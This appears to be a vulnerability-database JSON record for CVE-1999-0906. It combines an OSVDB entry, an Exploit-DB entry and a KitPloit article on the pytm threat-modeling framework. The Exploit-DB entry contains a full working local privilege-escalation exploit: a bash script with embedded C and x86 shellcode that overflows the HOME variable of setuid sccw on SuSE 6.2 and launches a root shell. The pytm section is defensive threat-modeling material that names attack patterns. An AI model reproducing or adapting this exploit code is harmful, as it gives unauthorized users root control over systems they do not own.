{"osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-1999-0906"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www.linuxsecurity.com/content/view/101962/112/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1999-q3/1030.html\nISS X-Force ID: 4114\n[CVE-1999-0906](https://vulners.com/cve/CVE-1999-0906)\nBugtraq ID: 656\n", "modified": "1999-09-23T00:00:00", "published": "1999-09-23T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:1081", "id": "OSVDB:1081", "title": "sscw HOME Environment Variable Local Overflow", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T12:01:29", "description": "S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability. CVE-1999-0906. Local exploit for linux platform", "published": "1999-09-23T00:00:00", "type": "exploitdb", "title": "S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0906"], "modified": "1999-09-23T00:00:00", "id": "EDB-ID:19508", "href": "https://www.exploit-db.com/exploits/19508/", "sourceData": "source: http://www.securityfocus.com/bid/656/info\r\n\r\nA buffer overflow vulnerability in sscw's handling of the HOME environment variable allows local users to gain root privileges. \r\n\r\n#!/bin/bash\r\n#\r\n# Linux x86 exploit for /usr/bin/sccw on SuSE 6.2\r\n#\r\n# -Brock Tellier btellier@webley.com\r\n\r\necho \"Building /tmp/sccwx.c...\"\r\ncat > /tmp/sccwx.c << FOEFOE\r\n/*\r\n * sccw local root Linux x86 tested on SuSE 6.2\r\n * gcc -o sccwx sccwx.c\r\n * must compile/run a setuid(geteuid()); system(\"/bin/bash\"); for a\r\nrootshell\r\n *\r\n * -Brock Tellier btellier@webley.com\r\n */\r\n\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\nchar exec[]= /* Generic Linux x86 running our /tmp program */\r\n \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\"\r\n \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\"\r\n \"\\x80\\xe8\\xdc\\xff\\xff\\xff/tmp/sc\";\r\n\r\n\r\n\r\n#define LEN 400\r\n#define NOP 0x90\r\n\r\nunsigned long get_sp(void) {\r\n\r\n__asm__(\"movl %esp, %eax\");\r\n\r\n}\r\n\r\n\r\nvoid main(int argc, char *argv[]) {\r\n\r\nint offset=0;\r\nint i;\r\nint buflen = LEN;\r\nlong int addr;\r\nchar buf[LEN];\r\n\r\n if(argc > 3) {\r\n fprintf(stderr, \"Error: Usage: %s offset buffer\\n\", argv[0]);\r\n exit(0);\r\n }\r\n else if (argc == 2){\r\n offset=atoi(argv[1]);\r\n\r\n }\r\n else if (argc == 3) {\r\n offset=atoi(argv[1]);\r\n buflen=atoi(argv[2]);\r\n\r\n }\r\n else {\r\n offset=2100;\r\n buflen=300;\r\n\r\n }\r\n\r\n\r\naddr=get_sp();\r\n\r\nfprintf(stderr, \"SuSE 6.2 sccw local root\\n\");\r\nfprintf(stderr, \"Brock Tellier btellier@webley.com\\n\");\r\nfprintf(stderr, \"Using addr: 0x%x\\n\", addr+offset);\r\n\r\nmemset(buf,NOP,buflen);\r\nmemcpy(buf+(buflen/2),exec,strlen(exec));\r\nfor(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)\r\n *(int *)&buf[i]=addr+offset;\r\n\r\nsetenv(\"HOME\", buf, 1);\r\nexecl(\"/usr/bin/sccw\", \"sccw\", NULL);\r\n\r\n}\r\nFOEFOE\r\n\r\necho \"Building /tmp/sccwuid.c...\"\r\n\r\ncat > /tmp/sccwuid.c <<EOFFOE\r\nvoid main()\r\n{\r\n setuid(geteuid());\r\n system(\"/bin/bash\");\r\n}\r\nEOFFOE\r\n\r\necho \"Compiling /tmp/sccwx...\"\r\ngcc -o /tmp/sccwx /tmp/sccwx.c\r\n\r\necho \"Compiling /tmp/sc...\"\r\ngcc -o /tmp/sc /tmp/sccwuid.c\r\n\r\necho \"Launching /tmp/sccwx...\"\r\n/tmp/sccwx\r\necho \"If it didn't work, try /tmp/sccwx <offset> <bufsiz>\"", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19508/"}], "kitploit": [{"lastseen": "2020-12-08T13:22:33", "bulletinFamily": "tools", "cvelist": ["CVE-1999-0906", "CVE-1999-0046"], "description": "[  ](<https://1.bp.blogspot.com/-9TGw490cd60/XjoxxI3WoyI/AAAAAAAARog/bJ9rasgVfM8p_lde8DEFBlyO3R504azcACNcBGAsYHQ/s1600/pytm_2_seq.png>)\n\n \nDefine your system in Python using the elements and properties described in the pytm framework. Based on your definition, pytm can generate, a Data Flow Diagram (DFD), a Sequence Diagram and most important of all, threats to your system. \n \n** Requirements ** \n\n\n * Linux/MacOS \n * Python 3.x \n * Graphviz package \n * Java (OpenJDK 10 or 11) \n * [ plantuml.jar ](<https://sourceforge.net/projects/plantuml/files/plantuml.jar/download> \"plantuml.jar\" )\n \n** Usage ** \n\n \n \n tm.py [-h] [--debug] [--dfd] [--report REPORT] [--exclude EXCLUDE] [--seq] [--list] [--describe DESCRIBE] optional arguments: -h, --help show this help message and exit --debug print debug messages --dfd output DFD (default) --report REPORT output report using the named template file (sample template file is under docs/template.md) --exclude EXCLUDE specify threat IDs to be ignored --seq output sequential diagram --list list all available threats --describe DESCRIBE describe the properties available for a given element \n\nCurrently available elements are: TM, Element, Server, ExternalEntity, Datastore, Actor, Process, SetOfProcesses, Dataflow, Boundary and Lambda. \nThe available properties of an element can be listed by using ` --describe ` followed by the name of an element: \n\n \n \n (pytm) \u279c pytm git:(master) \u2717 ./tm.py --describe Element Element OS check definesConnectionTimeout description dfd handlesResources implementsAuthenticationScheme implementsNonce inBoundary inScope isAdmin isHardened name onAWS \n\nFor the security practitioner, you may add new threats to the ` threatlib/threats.json ` file: \n\n \n \n tm.py [-h] [--debug] [--dfd] [--report REPORT] [--exclude EXCLUDE] [--seq] [--list] [--describe DESCRIBE]\n \n optional arguments:\n -h, --help show this help message and exit\n --debug print debug messages\n --dfd output DFD (default)\n --report REPORT output report using the named template file (sample template file is under docs/template.md)\n --exclude EXCLUDE specify threat IDs to be ignored\n --seq output sequential diagram\n --list list all available threats\n --describe DESCRIBE describe the properties available for a given element\n \n\n** CAVEAT ** \nThe ` threats.json ` file contains strings that run through eval() -> make sure the file has correct permissions or risk having an attacker change the strings and cause you to run code on their behalf. The logic lives in the \"condition\", where members of \"target\" can be logically evaluated. Returning a true means the rule generates a finding, otherwise, it is not a finding.** \nThe following is a sample ` tm.py ` file that describes a simple application where a User logs into the application and posts comments on the app. The app server stores those comments into the database. There is an AWS Lambda that periodically cleans the Database. \n\n \n \n (pytm) \u279c pytm git:(master) \u2717 ./tm.py --describe Element\n Element\n OS\n check\n definesConnectionTimeout\n description\n dfd\n handlesResources\n implementsAuthenticationScheme\n implementsNonce\n inBoundary\n inScope\n isAdmin\n isHardened\n name\n onAWS\n \n\nDiagrams are output as [ Dot ](<https://graphviz.gitlab.io/> \"Dot\" ) and [ PlantUML ](<https://plantuml.com/> \"PlantUML\" ) . \nWhen ` --dfd ` argument is passed to the above ` tm.py ` file it generates output to stdout, which is fed to Graphviz's dot to generate the Data Flow Diagram: \n\n \n \n {\n \"SID\":\"INP01\",\n \"target\": [\"Lambda\",\"Process\"],\n \"description\": \"Buffer Overflow via Environment Variables\",\n \"details\": \"This attack pattern involves causing a buffer overflow through [manipulation](<https://www.kitploit.com/search/label/Manipulation> \"manipulation\" ) of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.\",\n \"Likelihood Of Attack\": \"High\",\n \"severity\": \"High\",\n \"condition\": \"target.usesEnvironmentVariables is True and target.sanitizesInput is False and target.checksInputBounds is False\",\n \"prerequisites\": \"The application uses environment variables.An environment variable exposed to the user is [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to a buffe r overflow.The vulnerable environment variable uses untrusted data.Tainted data used in the environment variables is not properly validated. For instance boundary checking is not done before copying the input data to a buffer.\",\n \"mitigations\": \"Do not expose environment variable to the user.Do not use untrusted data in your environment variables. Use a language or compiler that performs automatic bounds checking. There are tools such as Sharefuzz [R.10.3] which is an environment variable fuzzer for Unix that support loading a shared library. You can use Sharefuzz to determine if you are exposing an environment variable vulnerable to buffer overflow.\",\n \"example\": \"Attack Example: [Buffer Overflow](<https://www.kitploit.com/search/label/Buffer%20Overflow> \"Buffer Overflow\" ) in $HOME A buffer overflow in sccw allows local users to gain root access via the $HOME environmental variable. Attack Example: Buffer Overflow in TERM A buffer overflow in the rlogin program involves its consumption of the TERM environmental variable.\",\n \"references\": \"https://capec.mitre.org/data/definitions/10.html, CVE-1999-0906, CVE-1999-0046, http://cwe.mitre.org/data/definitions/120.html, http://cwe.mitre.org/data/definitions/119.html, http://cwe.mitre.org/data/definitions/680.html\"\n }\n\nGenerates this diagram: \n\n\n[  ](<https://1.bp.blogspot.com/-Hm2ZfHPPJ50/XjoxsNzP86I/AAAAAAAARoc/SdZqJxktsJsp6ZeY9VZaLhHW4yT4QREaQCNcBGAsYHQ/s1600/pytm_1_dfd.png>)\n\n \nThe following command generates a Sequence diagram. \n\n \n \n #!/usr/bin/env python3\n \n from pytm.pytm import TM, Server, Datastore, Dataflow, Boundary, Actor, Lambda\n \n tm = TM(\"my test tm\")\n tm.description = \"another test tm\"\n \n User_Web = Boundary(\"User/Web\")\n Web_DB = Boundary(\"Web/DB\")\n \n user = Actor(\"User\")\n user.inBoundary = User_Web\n \n web = Server(\"Web Server\")\n web.OS = \"CloudOS\"\n web.isHardened = True\n \n db = Datastore(\"SQL Database (*)\")\n db.OS = \"CentOS\"\n db.isHardened = False\n db.inBoundary = Web_DB\n db.isSql = True\n db.inScope = False\n \n my_lambda = Lambda(\"cleanDBevery6hours\")\n my_lambda.hasAccessControl = True\n my_lambda.inBoundary = Web_DB\n \n my_lambda_to_db = Dataflow(my_lambda, db, \"(λ)Periodically cleans DB\")\n my_lambda_to_db.protocol = \"SQL\"\n my_lambda_to_db.dstPort = 3306\n \n user_to_web = Dataflow(user, web, \"User enters comments (*)\")\n user_to_web.protocol = \"HTTP\"\n user_to_web.dstPort = 80\n user_to_web.data = 'Comments in HTML or Markdown'\n user_to_web.order = 1\n \n web_to_user = Dataflow(web, user, \"Comments saved (*)\")\n web_to_user.protocol = \"HTTP\"\n web_to_user.data = 'Ack of saving or error message, in JSON'\n web_to_user.order = 2\n \n web_to_db = Dataflow(web, db, \"Insert query with comments\")\n web_to_db.protocol = \"MySQL\"\n web_to_db.dstPort = 3306\n web_to_db.data = 'MySQL insert statement, all literals'\n web_to_db.order = 3\n \n db_to_web = Dataflow(db, web, \"Comments contents\")\n db_to_web.protocol = \"MySQL\"\n db_to_web.data = 'Results of insert op'\n db_to_web.order = 4\n \n tm.process()\n\nGenerates this diagram: \n\n\n[  ](<https://1.bp.blogspot.com/-9TGw490cd60/XjoxxI3WoyI/AAAAAAAARog/bJ9rasgVfM8p_lde8DEFBlyO3R504azcACNcBGAsYHQ/s1600/pytm_2_seq.png>)\n\n \nThe diagrams and findings can be included in the template to create a final report: \n\n \n \n tm.py --dfd | dot -Tpng -o sample.png\n\nThe templating format used in the report template is very simple: \n\n \n \n # Threat Model Sample *** ## System Description {tm.description} ## Dataflow Diagram  ## Dataflows Name|From|To |Data|Protocol|Port ----|----|---|----|--------|---- {dataflows:repeat:{{item.name}}|{{item.source.name}}|{{item.sink.name}}|{{item.data}}|{{item.protocol}}|{{item.dstPort}} } ## Findings {findings:repeat:* {{item.description}} on element \"{{item.target}}\" } \n\n \n** Currently supported threats ** \n\n \n \n INP01 - Buffer Overflow via Environment Variables INP02 - Overflow Buffers INP03 - Server Side Include (SSI) Injection CR01 - Session Sidejacking INP04 - HTTP Request Splitting CR02 - Cross Site Tracing INP05 - [Command Line](<https://www.kitploit.com/search/label/Command%20Line> \"Command Line\" ) Execution through SQL Injection INP06 - SQL Injection through SOAP Parameter Tampering SC01 - JSON Hijacking (aka JavaScript Hijacking) LB01 - API Manipulation AA01 - Authentication Abuse/ByPass DS01 - Excavation DE01 - Interception DE02 - Double Encoding API01 - Exploit Test APIs AC01 - Privilege Abuse INP07 - Buffer Manipulation AC02 - Shared Data Manipulation DO01 - Flooding HA01 - Path Traversal AC03 - Subverting Environment Variable Values DO02 - Excessive Allocation DS02 - Try All Common Switches INP08 - Format String Injection INP09 - LDAP Injection INP10 - Parameter Injection INP11 - Relative Path Traversal INP12 - Client-side Injection-induced Buffer Overflow AC04 - XML Schema Poisoning DO03 - XML Ping of the Death AC05 - Content Spoofing INP13 - Command Delimiters INP14 - Input Data Manipulation DE03 - Sniffing Attacks CR03 - Dictionary-based Password Attack API02 - Exploit Script-Based APIs HA02 - White Box Reverse Engineering DS03 - Footprinting AC06 - Using Malicious Files HA03 - Web Application Fingerprinting SC02 - XSS Targeting Non-Script Elements AC07 - Exploiting Incorrectly Configured Access Control Security Levels INP15 - IMAP/SMTP Command Injection HA04 - Reverse Engineering SC03 - Embedding Scripts within Scripts INP16 - PHP Remote File Inclusion AA02 - Principal Spoof CR04 - Session Credential Falsification through Forging DO04 - XML Entity Expansion DS04 - XSS Targeting Error Pages SC04 - XSS Using Alternate Syntax CR05 - [Encryption](<https://www.kitploit.com/search/label/Encryption> \"Encryption\" ) Brute Forcing AC08 - Manipulate Registry Information DS05 - Lifting Sensitive Data Embedded in Cache \n\n \n \n\n\n** [ Download Pytm ](<https://github.com/izar/pytm> \"Download Pytm\" ) **\n", "edition": 9, "modified": "2020-02-10T11:30:06", "published": "2020-02-10T11:30:06", "id": "KITPLOIT:7491619584321501014", "href": "http://www.kitploit.com/2020/02/pytm-pythonic-framework-for-threat.html", "title": "Pytm - A Pythonic Framework For Threat Modeling", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
